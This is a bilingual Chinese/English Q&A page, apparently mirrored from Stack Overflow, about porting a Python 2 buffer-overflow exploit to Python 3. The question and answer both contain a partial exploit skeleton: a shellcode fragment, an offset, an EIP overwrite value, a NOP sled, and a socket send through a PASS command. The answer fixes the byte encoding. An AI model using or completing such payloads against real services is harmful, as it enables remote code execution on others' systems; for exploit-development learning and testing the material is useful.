利用Python 3开发 [英] Exploit development in Python 3

问题描述

我意识到使用python 3进行漏洞利用开发并不像使用python 2那样直接。

I realised that exploit development with python 3 is not as straight forward as it is using python 2.

据我了解，这主要是由于套接字库以及添加的 byte 数据类型。

As I understand, this is mainly due to the socket library and the added byte datatype.

例如，我不知道如何将以下代码转换为Python 3个代码：

For example, I could not figure out how to translate the following code into Python 3 code:

--- SNIP ---
shellcode =  ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16 
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}\r\n".format(buff))
--- SNIP ---

我尝试了以下操作：

--- SNIP ---
shellcode =  ""
shellcode += "\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
--- SNIP ---
offset = "A" * 2606
eip = "\x43\x62\x4b\x5f"
nop = "\x90" * 16 
padding = "C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
--- SNIP ---
bytes_sent = sock.send("PASS {}".format(buff).encode("UTF-8"))
--- SNIP ---

问题是 \x90 在内存中变成 C2 90 ，我花了几个小时才弄清楚问题来自我的代码。我还怀疑这也会改变shellcode。

The problem is that \x90 becomes C2 90 in memory, it tooks me hours to figure out that the issue came from my code. I also suspect that this could alter the shellcode as well.

我想学习在Python中执行此操作的正确方法

I would like to learn the proper way of doing this in Python

推荐答案

Python 2代码本质上建立了一个字节字符串。在Python 3中，'...'字符串文字代替了Unicode字符串对象。

The Python 2 code essentially builds up a byte string. In Python 3, '...' string literals build up a Unicode string object instead.

在Python 3中，则需要 bytes 个对象，您可以使用 b'...'个字节字符串文字来创建这些对象：

In Python 3, you want bytes objects instead, which you can creating by using b'...' byte string literals:

# --- SNIP ---
shellcode =  b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
# --- SNIP ---
offset = b"A" * 2606
eip = b"\x43\x62\x4b\x5f"
nop = b"\x90" * 16 
padding = b"C"
buff = offset + eip + nop + shellcode + padding * (424 - 351 - 16)
# --- SNIP ---
bytes_sent = sock.send(b"PASS %s\r\n" % buff)
# --- SNIP ---

bytes 没有 .format（）方法，但是％格式化操作仍然可用。

bytes doesn't have a .format() method, but the % formatting operation is still available.

这篇关于利用Python 3开发的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！